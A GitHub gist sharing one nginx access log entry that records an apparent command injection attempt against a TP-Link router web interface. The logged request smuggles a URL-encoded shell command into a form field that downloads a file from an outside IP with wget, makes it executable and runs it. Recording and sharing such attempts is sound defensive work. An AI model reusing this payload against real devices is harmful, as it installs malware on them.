Skip to content

Instantly share code, notes, and snippets.

@zcutlip
Last active July 25, 2024 03:59
Show Gist options
  • Save zcutlip/caa36daf07dfd52c1a2872ff8e7ac6e0 to your computer and use it in GitHub Desktop.
Save zcutlip/caa36daf07dfd52c1a2872ff8e7ac6e0 to your computer and use it in GitHub Desktop.
Command injection attempt found in nginx access log
84.54.51.37 - - [24/Jul/2024:12:57:14 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 162 "-" "Go-http-client/1.1"
@zcutlip
Copy link
Author

zcutlip commented Jul 25, 2024

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment